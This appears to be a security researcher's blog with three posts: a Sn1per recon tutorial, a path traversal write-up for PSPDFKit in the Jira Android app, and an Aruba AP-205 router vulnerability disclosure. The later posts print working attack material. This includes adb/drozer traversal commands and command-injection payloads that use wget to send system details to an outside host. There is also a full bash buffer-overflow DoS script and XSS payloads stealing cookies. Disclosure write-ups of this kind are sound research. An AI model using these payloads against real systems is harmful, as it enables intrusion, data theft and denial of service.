Bug Bounty Recon Like A Pro

Overview

In this blog post, I will cover the basic steps to performing bug bounty recon against large, open scoped programs and penetration tests.

If you’re like most starting out, this process can seem daunting and overwhelming depending on how many hosts you’re dealing with. Twitter for instance has 20,000+ subdomains and a HUGE attack surface to go through. How do you know where to focus your time? How do you keep track of which hosts you scanned and reviewed? These questions can quickly lead you spinning in circles, wasting valuable time while more experienced hunters get the gold. Luckily, there are tools and methodologies that can assist and make your life easier as a bug bounty hunter or penetration tester. This is where Sn1per comes in…

What is Sn1per?

Sn1per is an automated pentest reconnaissance scanner that can be used during penetration tests and bug bounties and to enumerate targets and scan for vulnerabilities. There are two versions of Sn1per available depending on your needs. Sn1per Community Edition (CE) is the open source scan engine that is maintained on Github (https://github.com/1N3/Sn1per). Sn1per Professional is XeroSecurity’s premium reporting add on for Sn1per and is available exclusively from the XeroSecurity website (https://xerosecurity.com).

Installation

Installation is extremely easy. Just clone the Github repo (git clone https://github.com/1N3/Sn1per) and run ./install.sh from a Kali Linux OS. This will install all tools and dependencies which are used to collect recon info and scan for vulnerabilities.

Scoping your target

So we have Sn1per installed and we’ve recited “The Rifleman’s Creed” a few times, the next phase is scoping our target. This is fairly obvious but we need to carefully review the bug bounty or pentest scope which gives us legal permission to test without getting thrown in prison. If you find yourself getting outside the intended scope, you’ve been warned – This “could” land you in jail!.
Now that the legal disclaimer is out of the way, what’s the first step?

Tactical Reconnaissance & OSINT

The first step in your reconnaissance process should be enumerating all subdomains and hosts within the target scope. For this, we’re interested in any wildcard domains (ie. *.target.com). In this case, it is up to the researcher to hunt for subdomains and hosts which fall within this target scope but haven’t been explicitly stated. For this, we will use sniper to actively and passively scan a target domain for subdomains via the -re switch and we’ll create a new workspace to store all our hosts via the -w switch. Additionally, we’ll also add the –osint switch to our scan to perform basic OSINT (Open Source Intelligence Gathering) searches on the target domain. This can reveal tons of useful information such as email addresses, public domains, documents, usernames, software used, whois info, reverse IP lookups, virtual hosts, etc. In addition, Sn1per will perform basic checks for subdomain hijacking and takeovers.
sniper -t target.com --recon --osint -w workspace_alias
This will store a complete list of all subdomains discovered and sorted at the following location:
/usr/share/sniper/loot/workspace/<WORKSPACE_ALIAS>/domains/domains-all-sorted.txt

Calling In The Airstrike…

 

Now that we’ve enumerated all subdomains for the in-scope wildcard domain, we need to quickly enumerate all hosts with a high level flyover. This can be done by passing our host list from the previous step via the -f switch and running sniper in airstrike mode via the -m airstrike options. This will store all gathered data to our workspace and combine the data from all hosts scanned under /usr/share/sniper/loot/workspace/<WORKSPACE_ALIAS>/. Some basic info gathered from this mode include: DNS, open ports, HTTP headers, SSL ciphers, web fingerprints, TCP banners, WAF detection and basic file/directory and passive URL discovery.
sniper -f /usr/share/sniper/loot/workspace/<WORKSPACE_ALIAS>/domains/domains-all-sorted.txt -m airstrike -w workspace

Summary

After the Sn1per finishes scanning all hosts in our workspace, Sn1per Professional gives us some high level info via the console for each host as shown below. This will help us get a high level visual of the attack surface based on which ports are open, interesting HTTP headers, page titles and DNS records. It will become very clear that if the host has no DNS or open ports, there probably isn’t much of an attack surface to dig into further. It’s best to focus on interesting ports (ie. port 21 (FTP), port 22 (SSH), 3306 (MySQL), etc.) and web targets with interesting headers (ie. Server: Apache Tomcat v7.0.0) may be vulnerable and have known exploit code available.

Professional Reporting Interface

After our report gets generated, we can see Sn1per enumerated and scanned 1268 unique hosts automatically. As a penetration tester, you can now sift through all the information contained in your workspace to begin looking for interesting hosts and potential vulnerabilities. To help us manage all this data, we will leverage Sn1per Professional for the next steps in the process. Sn1per Professional offers the following features to help make our lives a bit easier.

Features:

– Professional reporting interface.
– Slideshow for all gathered screenshots.
– Searchable and sortable DNS, IP and open port database.
– Quick links to online recon tools and Google hacking queries.
– Personalized notes field for each host.

Demo Video:

Slideshow For All Gathered Screenshots

From here, we can perform visual recon via the “Slideshow” feature in Sn1per Pro. This can reveal all sorts of potentially interesting hosts which can help identify which hosts need to be scanned further for more information.

Searchable/Sortable DNS, IP and Open Port Database

To supplement our surface level reconnaissance, we can also utilize the “Port List” feature which provides a widget of all subdomains, open ports, DNS and page titles. All data stored within this widget can then be sorted and searched for based on your needs (ie. If you’re looking for port 22/tcp (SSH), search for “22”. If you want to find all virtual hosts in the environment based on the same page title, enter the full page title (ie. “Overstock Cars”), etc. The possibilities here are endless but we can quickly find interesting hosts and ports or DNS records using this feature in Sn1per Professional.

Conclusion

This concludes part one of this series. This is by no means a comprehensive recon tutorial, but it should be enough to get you started in the process. Stay tuned for more recon tips and tricks for getting the most out of your bug bounty and pentest recon with Sn1per.
@xer0dayz

 

Exploiting Path Traversal in PSPDFKit for Android (2.3.3 – 2.8.0)

 

Introduction

As part of my research into the Atlassian bug bounty program managed by BugCrowd (https://bugcrowd.com/atlassian), I recently discovered a directory traversal vulnerability in PSPDFKit for Android 2.3.3 – 2.8.0. After announcing my discovery on Twitter (https://twitter.com/crowdshield/status/889690387513724928), I received a few tweets asking for a tutorial and PoC of my discoveries and decided to create a blog post to document it. This particular vulnerability was discovered in the Atlassian Jira Cloud application and was verified to be fixed in the latest release.

Technical Background

The Jira Cloud Android application (com.atlassian.android.jira.core) is vulnerable to directory traversal via the following exported content provider: content://com.atlassian.android.jira.core.pdf.share/. This allows an attacker to view the local file system on the affected Android device from external 3rd party applications installed on the same device. To exploit this flaw, an attacker can create a malicious application which queries the content provider directly in order to retrieve specific files stored locally on the device. If the victim installs the malicious application, an attacker can read files stored locally on the device. Alternatively, the content provider can be queried directory via the Android debug bridge (ADB) and does not require “root” access.

Detection

To enumerate the Android application, I used reverse-apk (https://github.com/1N3/ReverseAPK) which is a tool I wrote to reverse APK files. This revealed an exported content provider named com.pspdfkit.document.sharing.DocumentSharingProvider which means 3rd party apps on the same device can query the provider directly.

# reverse-apk com.atlassian.android.jira.apk
... SNIP ...
Displaying Content Providers in AndroidManifest.xml...
=====================================================================
<provider android:authorities="com.atlassian.android.jira.core.pdf.share" android:exported="true"
android:grantUriPermissions="true" android:name="com.pspdfkit.document.sharing.DocumentSharingProvider"/>
... SNIP ...

Scanning

Next, I used Drozer to scan for common vulnerabilities such as SQL injection and directory traversal. This revealed a vulnerable content provider (content://com.atlassian.android.jira.core.pdf.share) but did not detail how to exploit the flaw.

# drozer console --server 127.0.0.1:31415 connect
drozer Console (v2.3.4)
dz> run scanner.provider.traversal -a com.atlassian.android.jira.core
Scanning com.atlassian.android.jira.core...
Not Vulnerable:
content://com.atlassian.android.jira.core.feedback.fileprovider
content://downloads/public_downloads
content://com.atlassian.android.jira.core/
content://com.atlassian.android.jira.core
content://com.atlassian.android.jira.core.pdf.assets
content://com.atlassian.android.jira.core.feedback.fileprovider/
content://downloads/public_downloads/
content://com.atlassian.android.jira.core.pdf.assets/
Vulnerable Providers:
content://com.atlassian.android.jira.core.pdf.share
content://com.atlassian.android.jira.core.pdf.share/
dz> run scanner.provider.traversal -a com.atlassian.android.jira.core
Scanning com.atlassian.android.jira.core...
Not Vulnerable:
content://com.atlassian.android.jira.core.feedback.fileprovider
content://downloads/public_downloads
content://com.atlassian.android.jira.core/
content://com.atlassian.android.jira.core
content://com.atlassian.android.jira.core.pdf.assets
content://com.atlassian.android.jira.core.feedback.fileprovider/
content://downloads/public_downloads/
content://com.atlassian.android.jira.core.pdf.assets/
Vulnerable Providers:
content://com.atlassian.android.jira.core.pdf.share
content://com.atlassian.android.jira.core.pdf.share/

Source Code Analysis

Drozer seemed to indicate that the content provider was vulnerable to directory traversal so I decided to take a look at the source code to confirm for myself. This was accomplished by running reverse-apk and opening the affected file. This confirmed that the content provider accepts URI strings via the ParcelFileDescriptor method and reads the contents (ParcelFileDescriptor.open(file, i);).

com.atlassian.android.jira.core.apk-jadx/com/pspdfkit/document/sharing/DocumentSharingProvider.java

public ParcelFileDescriptor openFile(Uri uri, String mode) throws FileNotFoundException {
if (uri.getPath() == null) {
throw new FileNotFoundException(uri + " has empty path.");
} else if (getContext() == null) {
throw new IllegalStateException("Context was null.");
} else {
try {
int i;
File file = new File(getSharedFileDirectory(getContext()), uri.getPath());
if ("r".equals(mode)) {
i = 268435456;
} else if ("w".equals(mode) || "wt".equals(mode)) {
i = 738197504;
} else if ("wa".equals(mode)) {
i = 704643072;
} else if ("rw".equals(mode)) {
i = 939524096;
} else if ("rwt".equals(mode)) {
i = 1006632960;
} else {
i = 0;
}
return ParcelFileDescriptor.open(file, i);
} catch (IOException e) {
throw new FileNotFoundException(uri.toString() + " was not found.");
}
}
}

Exploitation

Now that I knew the content provider was vulnerable, I had to actually exploit this to do something useful. To do this, I used ADB (Android Debug Bridge) and Drozer (they essentially are the same thing and yield the same result..).

Drozer PoC

run app.provider.read content://com.atlassian.android.jira.core.pdf.share/.//..//.//..//.//..//.//..
//.//..//.//..//.//..//.//..///etc/hosts
127.0.0.1 localhost

ADB PoC

adb shell content query --uri content://com.atlassian.android.jira.core.pdf.share/.//..//.//..//.//..
//.//..//.//..//.//..//.//..//.//..///etc/hosts
127.0.0.1 localhost

Conclusion

After discovering the flaw, I reported the issue to Atlassian via BugCrowd and the issue was triaged by a BugCrowd analyst. Unfortunately, Atlassian later came back and reported that this issue was a duplicate and noted that this was a known issue affecting PSPDFKit for Android and has since been patched. As a consolation, I figured this would make a good blog post and Atlassian was nice enough to allow me to disclose the details publicly. The original advisory for PSPDFKit can be found below.

References

https://pspdfkit.com/guides/android/current/announcements/path-traversal-vulnerability/

Credit: [email protected]

Aruba Networks AP-205 (Multiple Vulnerabilities)

It’s been a while since I put out a new blog post, so I thought I’d share some insights into some older vulnerabilities I discovered while hacking on Aruba’s AP-205 wifi routers. Aruba was nice enough to ship out 2 FREE AP-205 devices to test and I ended up finding several vulnerabilities which paid out a total of ~$1,500. Not too shabby and I got to keep the routers after which was super cool of them! I’m releasing the technical details here purely for educational use. All of the vulnerabilities noted here have now been fixed. Enjoy! -1N3

Aruba AP-205 Remote Command Injection Vulnerability


Company: Aruba Networks
Device Model: AP-205
Firmware Version: ArubaOS 6.4.2.3-4.1.1.4_49446
Researcher: [email protected]
Bounty: $750.00

Aruba Networks AP-205 wireless routers suffer from remote command injection vulnerability in the WISPr input fields. This can be exploited by an attacker with authenticated access to the AP by crafting special escape character strings followed by standard linux commands. The Operator name, Location name and SSID/Zone fields are all vulnerable as seen by the below output. A permanent web backdoor could also be leveraged with time using the wget -O options to remotely grab a backdoor script from the attackers server and place locally in the web directory. PoC BLIND TIME BASED COMMAND EXECUTION:

wget http://192.168.1.145/test?`sleep 1`
RESULT: 1+ second delay in response time

wget http://192.168.1.145/test?`sleep 5`
RESULT: 5+ second delay in response time

wget http://192.168.1.145/test?`sleep 10`
RESULT: 10+ second delay in response time

REMOTE CONFIRMATION COMMAND EXECUTION:

; wget http://192.168.1.145/?`whoami`?`uname`?`pwd`
RESULT:
==> /var/log/apache2/crowdshield_access.log <==
192.168.1.148 - - [12/Aug/2015:19:56:09 -0400] "GET /?root?Linux?/aruba/bin HTTP/1.1" 200 7345 "-" "Wget"
192.168.1.148 - - [12/Aug/2015:19:56:09 -0400] "GET /?root?Linux?/aruba/bin, HTTP/1.1" 200 7345 "-" "Wget"
192.168.1.148 - - [12/Aug/2015:19:56:09 -0400] "GET /?root?Linux?/aruba/bin HTTP/1.1" 200 7345 "-" "Wget"

Aruba AP-205 Buffer Overflow Exploit (Memory Dislosure & DoS)


Company: Aruba Networks
Device Model: AP-205
Firmware Version: ArubaOS 6.4.2.3-4.1.1.4_49446
Researcher: [email protected]
Bounty: $150.00

The Aruba Networks AP-205 series is prone to a remote buffer overflow vulnerability because it fails to bounds-check user supplied input before copying it into an insufficiently sized memory buffer. Writing outside the bounds of a block of allocated memory results in a memory leak of sensitive details, denial of service and could lead to remote code execution. HTTP Request

HEAD / <INJECT LONG STRING UP TO 80900 BYTES HERE>
Host: instant.arubanetworks.com

Exploit Code PoC

#!/bin/bash
# Aruba Networks AP-205 Buffer Overflow Vulnerability
# Company: Aruba Networks
# Device Model: AP-205
# Firmware Version: ArubaOS 6.4.2.3-4.1.1.4_49446
# Researcher: 1N3 @ https://xerosecurity.com
# Date: 8/10/2015
#
# The Aruba Networks AP-205 series is prone to a remote buffer overflow
# vulnerability because it fails to bounds-check user-supplied input
# before copying it into an insufficiently sized memory buffer. Writing
# outside the bounds of a block of allocated memory results in a memory
# leak of sensitive details, denial of service and could lead to remote
# code execution.
#

TARGET="$1"

if [ -z $TARGET ]; then
echo "+ -- --=[Aruba Networks AP-205 Series BoF PoC by 1N3"
echo "+ -- --=[http://xerosecurity.com"
echo "+ -- --=[Usage: aruba_ap205_bof_poc "
echo ""
exit
fi

rm -f /tmp/buf
echo "HEAD / " `perl -e 'print "1"x80900'` > /tmp/buf
echo "Host: $TARGET" >> /tmp/buf
echo "" >> /tmp/buf
echo "Sending exploit..."
# cat /tmp/buf #DEBUG ONLY

for a in {1..1000};
do
cat /tmp/buf | ncat --ssl $TARGET 4343;
done

rm -f /tmp/buf

Screenshots
PoC Video

Walled Garden Stored DOM XSS


Company: Aruba Networks
Device Model: AP-205
Firmware Version: ArubaOS 6.4.2.3-4.1.1.4_49446
Researcher: [email protected]
Bounty: $150.00

Aruba Networks AP-205 wireless routers Walled Garden feature suffers from a stored DOM XSS vulnerability. Bug URL
https://192.168.1.148:4343/#home Affected Parameter
whitelist & blacklist input form fields Payload
“><iframe onload=alert(document.cookie)>

Captive Portal Stored DOM XSS


Company: Aruba Networks
Device Model: AP-205
Firmware Version: ArubaOS 6.4.2.3-4.1.1.4_49446
Researcher: [email protected]
Bounty: $150.00

Aruba Networks AP-205 wireless routers Captive Portal function suffers from a stored DOM XSS vulnerability. Bug URL
https://192.168.1.148:4343/#home Affected Parameter
title, welcome text and body text Payload
<iframe onload=prompt(1)> NOTE: This seems to only impact potential wifi guests connecting to the captive portal and may be intended functionality of the device.

DHCP Server Options Stored DOM XSS


Company: Aruba Networks
Device Model: AP-205
Firmware Version: ArubaOS 6.4.2.3-4.1.1.4_49446
Researcher: [email protected]
Bounty: $150.00

Aruba Networks AP-205 wireless routers DHCP Server Options function suffers from a stored DOM XSS vulnerability. Bug URL https://192.168.1.148:4343/#home Affected Parameter
vpn-scope-dhcp-option-valueX Payload
“><iframe onload=alert(document.cookie)></iframe>

SNMP Users Stored DOM XSS


Company: Aruba Networks
Device Model: AP-205
Firmware Version: ArubaOS 6.4.2.3-4.1.1.4_49446
Researcher: [email protected]
Bounty: $150.00

Aruba Networks AP-205 wireless routers SNMP Users function suffers from a stored DOM XSS vulnerability. Bug URL
https://192.168.1.148:4343/#home Affected Parameter
snmp-username Payload
<iframe onmouseover=prompt(1)>

Enterprise Domains Stored DOM XSS


Company: Aruba Networks
Device Model: AP-205
Firmware Version: ArubaOS 6.4.2.3-4.1.1.4_49446
Researcher: [email protected]
Bounty: $150.00

Aruba Networks AP-205 wireless routers Enterprise Domains function suffers from a stored DOM XSS vulnerability. Bug URL
https://192.168.1.148:4343/#home Affected Parameter
domain-name input field Payload
<img src=x onmouseover=alert(1)>